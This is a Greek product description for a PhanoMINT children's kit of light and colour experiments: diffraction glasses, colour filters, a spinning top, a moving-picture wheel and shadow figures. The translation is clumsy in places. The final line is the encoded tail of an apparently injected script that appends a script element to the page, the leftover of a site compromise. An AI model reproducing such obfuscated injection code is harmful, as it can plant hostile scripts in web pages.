M30341

M30341 Set Διασκεδαστικών Πειραμμάτων με Φως και Χρώματα

Πειράματα με το φως και τα χρώματα. Καλώς ήρθατε στον υπέροχο κόσμο του φωτός και των χρωμάτων! Αυτό το κουτί PhanoMINT διαθέτει όλα όσα χρειάζεστε για να πραγματοποιήσετε συναρπαστικά πειράματα με κύματα φωτός, σκιές και αντανακλάσεις. Ετοιμαστείτε να μαγευτείτε και να μάθετε γιατί δεν πρέπει πάντα να πιστεύετε στα μάτια σας!

Φανταστικά γυαλιά ουράνιου τόξου. Φορέστε τα, κοιτάξτε μέσα από τους φακούς και εκπλαγείτε: κοιτάξτε μέσα από τους φακούς αυτών των γυαλιών ουράνιου τόξου PhanoMINT και θα δείτε τα φωτεινά χρώματα του ουράνιου τόξου γύρω σας. Εκπληκτικό! Δείτε πώς λειτουργεί! Μόλις τοποθετήσετε τα γυαλιά στα μάτια σας, θα δείτε πολύχρωμα ουράνια τόξα να εμφανίζονται γύρω από πηγές φωτός όπως παράθυρα ή λάμπες. Θα δείτε ακόμη και ξαφνικά χρωματιστές άκρες να εμφανίζονται γύρω από αντικείμενα που φωτίζονται από το φως. Το σχήμα των φωτιζόμενων επιφανειών θα καθορίσει αν βλέπετε ρίγες, ακτίνες ή τόξα φωτός. Μπορείτε επίσης να κοιτάξετε τη δέσμη φωτός ενός πυρσού ή τη φλόγα ενός κεριού. Κουνήστε το κεφάλι σας με τα γυαλιά του ουράνιου τόξου και θα δείτε τα χρώματα να χορεύουν κυριολεκτικά ανάμεσα στα μάτια σας.

Μια γρήγορη εξήγηση. Το φως εξαπλώνεται μέσω του αέρα σε κύματα. Τα μεμονωμένα χρώματα του ουράνιου τόξου, που ονομάζονται επίσης φασματικά χρώματα, έχουν διαφορετικά μήκη κύματος. Το λευκό φως περιέχει όλα αυτά τα κύματα χρωμάτων ταυτόχρονα. Ωστόσο, μπορούμε να τα δούμε μόνο όταν το φως χωρίζεται στα χρώματα που περιέχει. Στη φύση, τα ουράνια τόξα δημιουργούνται από σταγονίδια νερού στον αέρα. Όταν εισέρχεται σε ένα σταγονίδιο, το ηλιακό φως διαθλάται, προκαλώντας την αλλαγή της κατεύθυνσής του. Επειδή τα μεμονωμένα χρώματα έχουν διαφορετικά μήκη κύματος, διαχωρίζονται το ένα από το άλλο κατά τη διαδικασία. Στη συνέχεια, τα χρωματιστά κύματα φωτός αντανακλώνται από το πίσω μέρος της σταγόνας, έτσι ώστε να μπορούμε να τα δούμε. Τα γυαλιά ουράνιου τόξου (που ονομάζονται επίσης γυαλιά περίθλασης) λειτουργούν με παρόμοιο τρόπο: οι φακοί τους αποτελούνται από δύο λεπτές μεμβράνες, η μία πάνω στην άλλη, στις οποίες είναι χαραγμένες εκατοντάδες λεπτές γραμμές. Οι αυλακώσεις είναι τόσο μικροσκοπικές που δεν μπορούμε να τις δούμε με γυμνό μάτι. Σε μία από τις μεμβράνες τρέχουν οριζόντια, στην άλλη κάθετα. Όταν το φως περνά τώρα μέσα από αυτό, χωρίζεται από αυτό το λεπτό πλέγμα. Αυτός είναι ο λόγος για τον οποίο το συσσωρευμένο φως που φαίνεται λευκό σε εμάς δεν φτάνει στα μάτια μας. Αντ ‘αυτού, μπορείτε να δείτε τα φασματικά χρώματα που περιέχονται στο φως. Δεν είναι ωραίο; Βεντάλια μαγικού χρώματος Με τη βεντάλια χρώματος της PhanoMINT μπορείτε να κάνετε ορατές τις μυστικές εικόνες και τα μηνύματα. Και δεν είναι μόνο αυτό: κοιτάζοντας μέσα από τους πολύχρωμους δίσκους, μερικά χρώματα εξαφανίζονται ξαφνικά, ενώ εμφανίζονται νέα. Λοιπόν, τι περιμένετε; Μάθετε τι σημαίνουν όλα! Δείτε πώς λειτουργεί! Τι συμβαίνει όταν κοιτάζετε μέσα από τους μεμονωμένους έγχρωμους δίσκους σε μια λευκή επιφάνεια, όπως ένα φύλλο χαρτιού, για παράδειγμα; Δεν είναι περίεργο: η επιφάνεια εμφανίζεται χρωματισμένη. Τώρα τοποθετήστε δύο έγχρωμους δίσκους τον ένα πάνω στον άλλο. Τι βλέπετε όταν συνδυάζετε μπλε και κόκκινο ή μπλε και κίτρινο, για παράδειγμα; Και τι συμβαίνει όταν παίρνετε όλους τους δίσκους της βεντάλιας ταυτόχρονα; Σχεδιάστε κάτι σε ένα φύλλο με ένα πράσινο στυλό. Στη συνέχεια, καλύψτε την εικόνα σχεδιάζοντας μια μουτζούρα πάνω της με ένα κόκκινο μολύβι. Με γυμνό μάτι, βλέπετε τώρα ένα άγριο σκαρίφημα πράσινου και κόκκινου. Αυτό αλλάζει όταν κοιτάζετε μέσα από τον πράσινο δίσκο: τώρα τα πράσινα δόντια εξαφανίζονται και βλέπετε μόνο τα κόκκινα. Το αντίστροφο, το κόκκινο σκαρίφημα γίνεται αόρατο όταν περάσατε από τον κόκκινο δίσκο. Θα δείτε τώρα τη μυστική πράσινη εικόνα σας να εμφανίζεται! Μπορείτε επίσης να το δοκιμάσετε με άλλα χρώματα, π.χ. με μπλε και κόκκινο. G. Κοιτάξτε τις μυστικές εικόνες από αυτό το σετ μέσα από τους διαφορετικούς έγχρωμους δίσκους. Ποιο δίσκο πρέπει να κοιτάξετε για να ανακαλύψετε τις κρυμμένες εικόνες;

Μια γρήγορη εξήγηση.

Χρειαζόμαστε φως για να μπορούμε να δούμε τα χρώματα. Το φως της ημέρας μας φαίνεται λευκό καθώς περνά ανεμπόδιστα στον αέρα. Αλλά όταν «πέφτει σε αντικείμενα, που αντανακλούν ορισμένα μήκη κύματος του φωτός και όχι άλλα μόνο τα ανακλώμενα μήκη κύματος φτάνουν στα μάτια μας και τα αντιλαμβανόμαστε ως χρώματα. Για παράδειγμα, μια μπάλα εμφανίζεται κόκκινη σε εμάς, γιατί αντανακλά μόνο το κόκκινο φως. Τα άλλα χρώματα απορροφώνται από αυτό, οπότε δεν μπορούμε να τα δούμε. Κάτι παρόμοιο συμβαίνει όταν κοιτάζουμε μέσα από τους έγχρωμους δίσκους: επηρεάζουν ποια τμήματα του φωτός αντανακλώνται. Για παράδειγμα, ο κόκκινος δίσκος απορροφά τα κόκκινα συστατικά του φωτός. Αυτό σας δυσκολεύει να δείτε κόκκινες γραμμές και αντικείμενα όταν κοιτάζετε μέσα από το κόκκινο παράθυρο. Εάν τοποθετήσετε δύο δίσκους τον έναν πάνω στον άλλο, το χρώμα του αντανακλώμενου φωτός αλλάζει. Και αν κοιτάξετε μέσα από όλους τους έγχρωμους δίσκους ταυτόχρονα, τα χρώματα εξαφανίζονται εντελώς. Αυτό συμβαίνει επειδή οι δίσκοι δεν επιτρέπουν πλέον στο φως να περάσει. Χωρίς φώς, όλα φαίνονται μέσα στο χρωματικό φάσμα μεταξύ γκρι και μαύρου για εσάς, ακριβώς όπως συμβαίνει τη νύχτα χωρίς φωτισμό.  Σβούρα χρώματος. Η περιστρεφόμενη σβούρα χρώματος της phanoMINT δείχνει εντυπωσιακά πώς η οπτική μας αντίληψη μπορεί να ξεγελαστεί από την κίνηση. Η κορυφή περιλαμβάνει δέκα μικρούς δίσκους, οι οποίοι είναι τυπωμένοι και στις δύο όψεις. Θέλετε να στοιχηματίσετε ότι κάθε μοτίβο επιφυλάσσει μια έκπληξη; Δείτε πώς λειτουργεί! Βάλτε ένα δίσκο στην περιστρεφόμενη κορυφή και ρίξτε μια καλή ματιά σε αυτό ενώ είναι ακίνητο. Στη συνέχεια, κάντε το δίσκο να στροβιλίζεται και παρακολουθήστε τα χρώματα και τα μοτίβα να αλλάζουν! Μια γρήγορη εξήγηση. Η «περιστροφή των μυρμηγκιών» στην περιστρεφόμενη σβούρα προκαλεί την ανάμειξη των χρωμάτων και των μοτίβων. Οι σπείρες γίνονται λωρίδες και μεμονωμένα χρωματικά πεδία εξαφανίζονται ή συγχωνεύονται σε νέα χρώματα. Αυτό οφείλεται στο γεγονός ότι το φως που αντανακλάται από τα μεμονωμένα χρώματα ρίχνεται στα μάτια μας σε πολύ σύντομα χρονικά διαστήματα. Αυτό σημαίνει ότι δεν μπορούμε να διακρίνουμε μεταξύ των χρωμάτων, με αποτέλεσμα μεμονωμένες επιφάνειες να παράγουν εφέ όπως μικτά χρώματα. Με άλλους δίσκους, οι αντιθέσεις ξεχωρίζουν επίσης πιο καθαρά επειδή δεν μπορούμε πλέον να δούμε κενά μεταξύ των μοτίβων, για παράδειγμα, λόγω της ταχείας περιστροφής.

Θαυματουργός Τροχός.

Ο «επιβλητικός» τροχός της PhanoMINT ξεγελά τις αισθήσεις μας τόσο εύκολα που συνορεύει με τη μαγεία. Φυσικά, υπάρχει και μια επιστημονική εξήγηση γι’ αυτό!

Δείτε πώς λειτουργεί! Συνδέστε έναν από τους μεγάλους δίσκους στο ξύλινο ραβδί με τη βίδα. Τοποθετήστε τον καθρέφτη έτσι ώστε να μπορείτε να τον κοιτάξετε από πίσω μέσα από τις σχισμές στο δίσκο. Εναλλακτικά, μπορείτε επίσης να χρησιμοποιήσετε οποιονδήποτε άλλο καθρέφτη, όπως ο καθρέφτης του μπάνιου σας. Κάντε το δίσκο να περιστρέφεται ενώ κοιτάζετε στον καθρέφτη από πίσω μέσα από τις σχισμές. Βλέπετε κινούμενες εικόνες όπως σε μια ταινία. Εντυπωσιακό!

Μια γρήγορη εξήγηση. Το ίδιο φαινόμενο συμβαίνει και με τον μαγικό τροχό- η γρήγορη κίνηση είναι ζωτικής σημασίας για την αντίληψή μας. Αν κοιτάξετε το μπροστινό μέρος του περιστρεφόμενου δίσκου χωρίς καθρέφτη, οι εικόνες και τα μοτίβα συγχωνεύονται με παρόμοιο τρόπο με μια έγχρωμη περιστρεφόμενη κορυφή. Κοιτάζοντας μέσα από τις σχισμές στον καθρέφτη, από την άλλη πλευρά, δίνει την εντύπωση ότι οι εικόνες κινούνται σε οθόνη. Ο λόγος για αυτό είναι η συνεχής εναλλαγή μεταξύ των ερεθισμάτων έντονου φωτός που πέφτουν μέσα από τις σχισμές και της όρασης στο μονόχρωμο πίσω μέρος του δίσκου. Κάθε φορά που μια σχισμή περνάει, μια νέα εικόνα έχει πάρει τη θέση της προηγούμενης. Το αντιλαμβανόμαστε αυτό ως κίνηση και ξεθωριάζουμε τις ενδιάμεσες φάσεις χωρίς κατοπτρική εικόνα. Παρεμπιπτόντως, οι ταινίες κινουμένων σχεδίων αποτελούνται επίσης από πολλές μεμονωμένες εικόνες που συνδέονται γρήγορα μεταξύ τους. Για να δημιουργήσετε την εντύπωση κινούμενων εικόνων, χρειάζεστε 12 έως 24 καρέ ανά δευτερόλεπτο.

Χορευτικές φιγούρες σκιών. Πώς μπορούν να κινηθούν οι σκιές των ακίνητων μορφών; Λύστε το παζλ και αφήστε τις φιγούρες σκιάς PhanoMINT να χορέψουν στο φως! Δείτε πώς λειτουργεί! Για να κάνετε τις σκιές να χορεύουν, θα χρειαστείτε μια πηγή φωτός και μια φωτεινή επιφάνεια, όπως έναν τοίχο ή ένα μεγάλο φύλλο χαρτιού. Κρατήστε τις φιγούρες μεταξύ του φωτός και της επιφάνειας έτσι ώστε οι σκιές τους να εμφανίζονται στην επιφάνεια. Όσο πιο κοντά κρατάτε τις φιγούρες στη φωτεινή επιφάνεια, τόσο μικρότερες και πιο καθαρές θα φαίνονται οι σκιές. Αντιστρόφως, καθώς μετακινείτε τις φιγούρες πιο μακριά από την επιφάνεια, οι σκιές γίνονται μεγαλύτερες και πιο θολές. Πάρτε έναν φακό στο ένα χέρι και μια φιγούρα σκιάς στο άλλο. Τώρα αλλάξτε. Τοποθετήστε και διαμορφώστε τη σκιά μετακινώντας τον φακό. Πώς πρέπει να είναι ο φακός για να κάνει τη σκιά στενή και μακριά ή φαρδιά και κοντή; Τώρα δοκιμάστε το με δύο φακούς, χρησιμοποιόντας ένα βοηθό. Θημηθείτε μετακινήστε τους δύο φακούς και παρακολουθήστε τις σκιές να χορεύουν.

Μια γρήγορη εξήγηση. Οι σκιές δημιουργούνται πάντα όταν σταματούν οι ακτίνες φωτός. Οι σκιές παίρνουν το κατά προσέγγιση σχήμα των αντικειμένων που εμποδίζουν το φως. Η κατεύθυνση από την οποία το φως χτυπά ένα αντικείμενο και η γωνία παίζουν σημαντικό ρόλο. Αυτός είναι ο λόγος για τον οποίο, για παράδειγμα, μεγάλες σκιές σχηματίζονται έξω το πρωί και το βράδυ, όταν οι ακτίνες του ήλιου πέφτουν υπό γωνία. Από την άλλη πλευρά, ο ήλιος είναι ψηλά στον ουρανό το μεσημέρι, οι σκιές είναι μικρές ή δεν είναι καθόλου ορατές. Για να μετακινηθεί μια σκιά, πρέπει είτε να μετακινηθεί η πηγή φωτός είτε να μετακινηθεί το αντικείμενο που εμποδίζει το φως. Το φως πέφτει σε ένα αντικείμενο από διαφορετικές κατευθύνσεις, μπορεί επίσης να ρίξει αρκετές σκιές. Μετακινώντας τους πυρσούς, μπορείτε να κάνετε τις σκιές της φιγούρας σας να χορεύουν ενώ η φιγούρα παραμένει σταθερά στη θέση της. Ίσως θα θέλατε να φτιάξετε μια ιστορία και να κάνετε ένα μικρό θέατρο σκιών με φίλους;

 

 

7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/